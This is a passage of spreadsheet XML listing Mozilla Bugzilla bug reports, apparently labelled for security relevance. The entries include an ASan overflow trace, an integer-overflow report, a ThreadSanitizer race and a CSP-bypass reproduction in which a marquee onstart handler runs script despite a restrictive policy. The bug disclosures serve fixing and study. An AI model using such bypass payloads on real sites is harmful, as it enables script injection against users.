&gt;    #9 0x7f2ce0b3a677 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:849
&gt;    #10 0x7f2ce0bcaf46 in nsFirstLetterFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsFirstLetterFrame.cpp:217
&gt;    #11 0x7f2ce0b3a5d2 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:842
&gt;    #12 0x7f2ce0ca3ce3 in nsInlineFrame::ReflowInlineFrame(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsIFrame*, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:721
&gt;    #13 0x7f2ce0ca28f7 in nsInlineFrame::ReflowFrames(nsPresContext*, nsHTMLReflowState const&amp;, nsInlineFrame::InlineReflowState&amp;, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:587
&gt;    #14 0x7f2ce0ca1441 in nsInlineFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsInlineFrame.cpp:395
&gt;    #15 0x7f2ce0b3a5d2 in nsLineLayout::ReflowFrame(nsIFrame*, unsigned int&amp;, nsHTMLReflowMetrics*, bool&amp;) layout/generic/nsLineLayout.cpp:842
&gt;    #16 0x7f2ce0b924ff in nsBlockFrame::ReflowInlineFrame(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsIFrame*, LineReflowStatus*) layout/generic/nsBlockFrame.cpp:3716
&gt;    #17 0x7f2ce0b90d4c in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) layout/generic/nsBlockFrame.cpp:3513
&gt;    #18 0x7f2ce0b8a720 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3374
&gt;    #19 0x7f2ce0b7d2b8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2528
&gt;    #20 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #21 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;    #22 0x7f2ce0b87876 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3099
&gt;    #23 0x7f2ce0b7d2d5 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2525
&gt;    #24 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #25 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;    #26 0x7f2ce0b87876 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3099
&gt;    #27 0x7f2ce0b7d2d5 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2525
&gt;    #28 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #29 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;
&gt;SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
&gt;Shadow bytes around the buggy address:
&gt;  0x0c1880055e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1880055ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1880055eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1880055ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1880055ed0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
&gt;=&gt;0x0c1880055ee0: 00 00 00 00 00 00 00 04 fa[fa]fa fa fa fa fa fa
&gt;  0x0c1880055ef0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c1880055f00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
&gt;  0x0c1880055f10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
&gt;  0x0c1880055f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c1880055f30: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Contiguous container OOB:fc
&gt;  ASan internal:           fe
&gt;==2982==ABORTING</t>
        </is>
      </c>
      <c r="X6418" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6419">
      <c r="A6419" t="n">
        <v>1387622</v>
      </c>
      <c r="B6419" t="inlineStr">
        <is>
          <t>2017-08-04 15:09:34 -0700</t>
        </is>
      </c>
      <c r="C6419" t="inlineStr">
        <is>
          <t>Add latest-ssl aliases for bedrock to use</t>
        </is>
      </c>
      <c r="D6419" t="inlineStr">
        <is>
          <t>2018-06-26 07:25:19 -0700</t>
        </is>
      </c>
      <c r="E6419" t="n">
        <v>1</v>
      </c>
      <c r="F6419" t="n">
        <v>1</v>
      </c>
      <c r="G6419" t="n">
        <v>5</v>
      </c>
      <c r="H6419" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6419" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6419" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K6419" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6419" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6419" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6419" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6419" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q6419" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6419" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6419" t="n">
        <v>1</v>
      </c>
      <c r="U6419" t="n">
        <v>0</v>
      </c>
      <c r="V6419" t="n">
        <v>35</v>
      </c>
      <c r="W6419" t="inlineStr">
        <is>
          <t>So this is quite an interesting thing I discovered today while talking to :catlee about the 55.0 release.
Context:
===
1. Among the first tasks to run in the beta/release graph, there is the bouncer submission one. This task lies here[1] and uses this config file[2] (e.g. beta). For each of those products, per each platform it submits all those paths (paths to mirrors future location of the artifacts) to bouncer[3].
2. "release-localtest" updates are served directly from the candidates directory so this is easy.
3. "release-cdntest" updates are served via downloads page[4]. The downloads page gets its information from bouncer. If we haven't pushed to mirrors yet, all these updates, even though retrieved as valid urls from Balrog, would result in 404. That is because bouncer checks (well, technically Sentry) if files exist at the locations before redirecting to them. Since no push-to-mirrors happened, there's gonna be 404. So as soon as we complete this step (push-to-mirrors), updates to "release-cdntest" become available.
4. After we publish to "release" channel, there are a couple of builders which get unblocked, out of which are:
4.1 mark the release as shipped in Ship-it
Once we mark a release as shipped, there's a chain of tools that eventually get updated:  "ship-it -&gt; product-details -&gt; product-details-json -&gt; bedrock -&gt; www". This usually takes about 30mins or less.
4.2 update bouncer aliases
We've got a small script[5] that talks to bouncer aliases based on this[2] configs, and tells it to update the `firefox-latest` and `firefox-stub` to the current release. This means that once this builder is completed, all urls like this[6], regardless of the platform, will serve the latest version.
Then what is the problem then?
===
If we glance at the source of the downloads page[7], we notice that except the Win32 installer which gets served by querying the `firefox-stub`, none of the other platforms do so, but instead have versioned urls:
https://download.mozilla.org/?product=firefox-stub&amp;os=win&amp;lang=en-US
https://download.mozilla.org/?product=firefox-54.0.1-SSL&amp;os=win64&amp;lang=en-US
https://download.mozilla.org/?product=firefox-54.0.1-SSL&amp;os=osx&amp;lang=en-US
https://download.mozilla.org/?product=firefox-54.0.1-SSL&amp;os=linux&amp;lang=en-US
https://download.mozilla.org/?product=firefox-54.0.1-SSL&amp;os=linux64&amp;lang=en-US
Historically, the bouncer aliases were added specifically to support the `firefox-stub` so that we can offer the latest stub installer to win32 users. But question is, now that we have the context and logic to support this operation for all the other platforms, why are we still having this urls versioned?
Solution
If we move these urls to point to "firefox-latest", they will be available as soon as the bouncer aliases builder job runs in our graph. That is ~30 mins faster than waiting for "ship-it -&gt; product-details -&gt; product-details-json -&gt; bedrock -&gt; www" chain.
Resolution
* we need to investigate more to make sure we're not misunderstanding something here
* we need to rope in all the teams involved along the line
* see if we can do this and if this makes sense.
Observation:
* bedrock is just for releases, not for nightly. nightlies version from downloads page[7] talks directly to bouncer and is part of the reason why we manually update[8] these at each nightly =&gt; beta version bump. This is the reason why we update bouncer directly during mergeduty[8] each time we bump the version in nightly.
[1]: https://dxr.mozilla.org/mozilla-central/rev/52285ea5e54c73d3ed824544cef2ee3f195f05e6/testing/mozharness/scripts/bouncer_submitter.py
[2]: https://dxr.mozilla.org/mozilla-central/rev/52285ea5e54c73d3ed824544cef2ee3f195f05e6/testing/mozharness/configs/releases/bouncer_firefox_release.py
[3]: http://bounceradmin.mozilla.com/
[4]: http://download.mozilla.org/?product=firefox-55.0....
[5]: https://dxr.mozilla.org/mozilla-central/rev/52285ea5e54c73d3ed824544cef2ee3f195f05e6/testing/mozharness/scripts/release/postrelease_bouncer_aliases.py
[6]: https://download.mozilla.org/?product=firefox-54.0.1-SSL&amp;os=OS_TO_FILL&amp;lang=en-US
[7]: view-source:https://www.mozilla.org/en-US/firefox/new/?scene=2
[8]: https://github.com/mozilla/releasewarrior/blob/master/how-tos/mergeduty.md#bump-bouncer-versions</t>
        </is>
      </c>
      <c r="X6419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6420">
      <c r="A6420" t="n">
        <v>1391270</v>
      </c>
      <c r="B6420" t="inlineStr">
        <is>
          <t>2017-08-17 08:03:59 -0700</t>
        </is>
      </c>
      <c r="C6420" t="inlineStr">
        <is>
          <t>Run unit tests on v9.x branch for Firefox and Firefox Beta schemes</t>
        </is>
      </c>
      <c r="D6420" t="inlineStr">
        <is>
          <t>2017-09-12 09:45:54 -0700</t>
        </is>
      </c>
      <c r="E6420" t="n">
        <v>1</v>
      </c>
      <c r="F6420" t="n">
        <v>1</v>
      </c>
      <c r="G6420" t="n">
        <v>2</v>
      </c>
      <c r="H6420" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6420" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J6420" t="inlineStr">
        <is>
          <t>Build &amp; Test</t>
        </is>
      </c>
      <c r="K6420" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6420" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6420" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N6420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6420" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q6420" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6420" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6420" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6420" t="n">
        <v>1</v>
      </c>
      <c r="U6420" t="n">
        <v>0</v>
      </c>
      <c r="V6420" t="n">
        <v>4</v>
      </c>
      <c r="W6420" t="inlineStr">
        <is>
          <t>Run unit tests on v9.x branch for Firefox and Firefox Beta schemes</t>
        </is>
      </c>
      <c r="X6420" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6421">
      <c r="A6421" t="n">
        <v>1141792</v>
      </c>
      <c r="B6421" t="inlineStr">
        <is>
          <t>2015-03-10 14:53:39 -0700</t>
        </is>
      </c>
      <c r="C6421" t="inlineStr">
        <is>
          <t>[fxos-automation] Add support for taskcluster npm-cache in gaia</t>
        </is>
      </c>
      <c r="D6421" t="inlineStr">
        <is>
          <t>2015-07-14 03:10:01 -0700</t>
        </is>
      </c>
      <c r="E6421" t="n">
        <v>1</v>
      </c>
      <c r="F6421" t="n">
        <v>1</v>
      </c>
      <c r="G6421" t="n">
        <v>5</v>
      </c>
      <c r="H6421" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6421" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J6421" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6421" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6421" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6421" t="inlineStr">
        <is>
          <t>[fxos-automation]</t>
        </is>
      </c>
      <c r="Q6421" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6421" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6421" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6421" t="n">
        <v>1</v>
      </c>
      <c r="U6421" t="n">
        <v>0</v>
      </c>
      <c r="V6421" t="n">
        <v>37</v>
      </c>
      <c r="W6421" t="inlineStr">
        <is>
          <t>We're trying to get rid of our tarball node modules trick in favor of a pre-populated cache as part of the docker image tasks.</t>
        </is>
      </c>
      <c r="X6421" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6422">
      <c r="A6422" t="n">
        <v>1312272</v>
      </c>
      <c r="B6422" t="inlineStr">
        <is>
          <t>2016-10-23 08:45:29 -0700</t>
        </is>
      </c>
      <c r="C6422" t="inlineStr">
        <is>
          <t>"onstart" event for "marquee" bypasses 'unsafe-inline' CSP directive</t>
        </is>
      </c>
      <c r="D6422" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:41 -0700</t>
        </is>
      </c>
      <c r="E6422" t="n">
        <v>1</v>
      </c>
      <c r="F6422" t="n">
        <v>1</v>
      </c>
      <c r="G6422" t="n">
        <v>3</v>
      </c>
      <c r="H6422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6422" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6422" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K6422" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L6422" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6422" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6422" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6422" t="inlineStr">
        <is>
          <t>[domsecurity-backlog1][adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q6422" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6422" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6422" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T6422" t="n">
        <v>1</v>
      </c>
      <c r="U6422" t="n">
        <v>0</v>
      </c>
      <c r="V6422" t="n">
        <v>66</v>
      </c>
      <c r="W6422" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Steps to reproduce:
Open the following URL: data:text/html,&lt;meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'unsafe-eval'"&gt;&lt;marquee onstart="alert('test')"&gt;&lt;/marquee&gt;
Actual results:
JavaScript code "alert('test')" will be executed, while "'inline-inline'" not specified in CSP policy.
Expected results:
_inline_ javascript code not executed.</t>
        </is>
      </c>
      <c r="X6422" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6423">
      <c r="A6423" t="n">
        <v>922603</v>
      </c>
      <c r="B6423" t="inlineStr">
        <is>
          <t>2013-10-01 05:40:17 -0700</t>
        </is>
      </c>
      <c r="C6423" t="inlineStr">
        <is>
          <t>Signed integer overflow in image/src/imgFrame.cpp</t>
        </is>
      </c>
      <c r="D6423" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:33 -0800</t>
        </is>
      </c>
      <c r="E6423" t="n">
        <v>1</v>
      </c>
      <c r="F6423" t="n">
        <v>1</v>
      </c>
      <c r="G6423" t="n">
        <v>3</v>
      </c>
      <c r="H6423" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6423" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6423" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K6423" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6423" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6423" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6423" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6423" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q6423" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6423" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6423" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T6423" t="n">
        <v>1</v>
      </c>
      <c r="U6423" t="n">
        <v>0</v>
      </c>
      <c r="V6423" t="n">
        <v>9</v>
      </c>
      <c r="W6423" t="inlineStr">
        <is>
          <t>The following part of our codebase show signed integer overflows at runtime (when running our tests, based on mozilla-inbound 8bf84234319a):
# Format is: Location, Error, Test that triggered it (each in a single line)
image/src/imgFrame.cpp:58
runtime error: signed integer overflow: 65535 * 65535 cannot be represented in type 'int'
file:///builds/slave/test/build/tests/reftest/tests/image/test/crashtests/invalid-size.gif
Signed integer overflows are undefined behavior according to the C/C++ standard and discouraged by the CERT Secure Coding Standard. Even if the overflow itself is intended/checked (which should also be verified), we should not rely on the result, nor on any checks performed with the result after the computation. In the optimization stage, the compiler may assume overflow is not happening and produce wrong results as well as eliminate further checks, recognized as dead code. For further information, see the tracking bug.
Marked as security sensitive until investigated because this overflow is indeed checked afterwards:
&gt;  // check to make sure we don't overflow a 32-bit
&gt;  int32_t tmp = aWidth * aHeight;
&gt;  if (MOZ_UNLIKELY(tmp / aHeight != aWidth)) {
&gt;    NS_WARNING("width or height too large");
&gt;    return false;
&gt;  }
As the if branch is only hit in the overflow case, an optimizing compiler could completely remove it, assuming that overflow does not happen.
Putting needinfo on ehsan according to hg blame for that particular code. If you're not the right person to take a look, could you please suggest someone? :) Thanks!</t>
        </is>
      </c>
      <c r="X6423" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6424">
      <c r="A6424" t="n">
        <v>870711</v>
      </c>
      <c r="B6424" t="inlineStr">
        <is>
          <t>2013-05-10 02:43:24 -0700</t>
        </is>
      </c>
      <c r="C6424" t="inlineStr">
        <is>
          <t>[B2G] [Leo][SMS] It is possible to invoke the Browser App from an invalid URL text included in a SMS</t>
        </is>
      </c>
      <c r="D6424" t="inlineStr">
        <is>
          <t>2013-10-16 00:59:56 -0700</t>
        </is>
      </c>
      <c r="E6424" t="n">
        <v>1</v>
      </c>
      <c r="F6424" t="n">
        <v>1</v>
      </c>
      <c r="G6424" t="n">
        <v>6</v>
      </c>
      <c r="H6424" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6424" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6424" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K6424" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6424" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6424" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6424" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6424" t="inlineStr">
        <is>
          <t xml:space="preserve">leorun1, c=, leorun3, leorun4,[leo-triage] ,[LeoVB+] </t>
        </is>
      </c>
      <c r="Q6424" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6424" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6424" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T6424" t="n">
        <v>1</v>
      </c>
      <c r="U6424" t="n">
        <v>0</v>
      </c>
      <c r="V6424" t="n">
        <v>36</v>
      </c>
      <c r="W6424" t="inlineStr">
        <is>
          <t>Tested on a Leo device. 
Platform Version: 18.0 Build ID: 20130425170448 Gaia: f9d8af0
STEPS:
1. Send from another device to the Device under Test an SMS including an invalid URL expression 
(Valid expression in accordance with the wireframe https://bugzilla.mozilla.org/attachment.cgi?id=725423, is:
" /(^|\s|,|;)[-\w:%\+.~#?&amp;//=]{2,256}\.[a-z]{2,6}(?:\/[-\w:%\+.~#?&amp;//=]*)?/mgi")  
(e.g. invalid expressions testing both in sent and recieved SMS are:
"http://www.b/g/v.com/",
"htt://www.google.com/", 
"http://www.wikipedia.o/",)
2. Open in the Device under Test the SMS APP
3. Search and tap on the SMS
EXPECTED RESULT:
1 y 2. The invalid URL expresion is shown in the same way that the rest of the content of the SMS thread (text).
3. Cannot open the Browser App
ACTUAL RESULT:
The invalid URL expresion is shown highlighted in the SMS thread view, and tapping in the two last expressions ("htt://www.google.com/","http://www.wikipedia.o/"), the Browser is opened showing incorrect sites.</t>
        </is>
      </c>
      <c r="X6424" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6425">
      <c r="A6425" t="n">
        <v>1607153</v>
      </c>
      <c r="B6425" t="inlineStr">
        <is>
          <t>2020-01-06 01:55:02 -0800</t>
        </is>
      </c>
      <c r="C6425" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race [@ IPC::Channel::ChannelImpl::ProcessIncomingMessages] vs. [@ GetClientFileDescriptorMapping]</t>
        </is>
      </c>
      <c r="D6425" t="inlineStr">
        <is>
          <t>2020-02-03 10:51:05 -0800</t>
        </is>
      </c>
      <c r="E6425" t="n">
        <v>1</v>
      </c>
      <c r="F6425" t="n">
        <v>1</v>
      </c>
      <c r="G6425" t="n">
        <v>3</v>
      </c>
      <c r="H6425" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6425" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6425" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K6425" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6425" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6425" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6425" t="inlineStr"/>
      <c r="Q6425" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6425" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6425" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T6425" t="n">
        <v>1</v>
      </c>
      <c r="U6425" t="n">
        <v>0</v>
      </c>
      <c r="V6425" t="n">
        <v>11</v>
      </c>
      <c r="W6425" t="inlineStr">
        <is>
          <t>The attached crash information was detected while running CI tests with ThreadSanitizer on mozilla-central revision c0a6eb95b65c.
This is one of a group of read/write races on `client_pipe_` that I see during tests. Looks like we are closing and setting `client_pipe_` to `-1` but at the same time, another thread is reading `client_pipe_`, either getting the old value or `-1`.
### General information about TSan reports
#### Why fix races?
Data races are undefined behavior and can cause crashes as well as correctness issues. Compiler optimizations can cause racy code to have unpredictable and hard-to-reproduce behavior.
#### Rating
If you think this race can cause crashes or correctness issues, it would be great to rate the bug appropriately as P1/P2 and/or indicating this in the bug. This makes it a lot easier for us to assess the actual impact that these reports make and if they are helpful to you.
#### False Positives / Benign Races
Typically, races reported by TSan are not false positives [1], but it is possible that the race is benign. Even in this case it would be nice to come up with a fix if it is easily doable and does not regress performance. Every race that we cannot fix will have to remain on the suppression list and slows down the overall TSan performance. Also note that seemingly benign races can possibly be harmful (also depending on the compiler, optimizations and the architecture) [2][3].
[1] One major exception is the involvement of uninstrumented code from third-party libraries.
[2] http://software.intel.com/en-us/blogs/2013/01/06/benign-data-races-what-could-possibly-go-wrong
[3] How to miscompile programs with "benign" data races: https://www.usenix.org/legacy/events/hotpar11/tech/final_files/Boehm.pdf
#### Suppressing unfixable races
If the bug cannot be fixed, then a runtime suppression needs to be added in `mozglue/build/TsanOptions.cpp`. The suppressions match on the full stack, so it should be picked such that it is unique to this particular race. The bug number of this bug should also be included so we have some documentation on why this suppression was added.</t>
        </is>
      </c>
      <c r="X6425" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6426">
      <c r="A6426" t="n">
        <v>1357094</v>
      </c>
      <c r="B6426" t="inlineStr">
        <is>
          <t>2017-04-17 07:36:04 -0700</t>
        </is>
      </c>
      <c r="C6426" t="inlineStr">
        <is>
          <t>Deploy BBB 2.0.0</t>
        </is>
      </c>
      <c r="D6426" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E6426" t="n">
        <v>1</v>
      </c>
      <c r="F6426" t="n">
        <v>1</v>
      </c>
      <c r="G6426" t="n">
        <v>5</v>
      </c>
      <c r="H6426" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6426" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6426" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6426" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6426" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6426" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6426" t="inlineStr"/>
      <c r="Q6426" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6426" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6426" t="n">
        <v>1</v>
      </c>
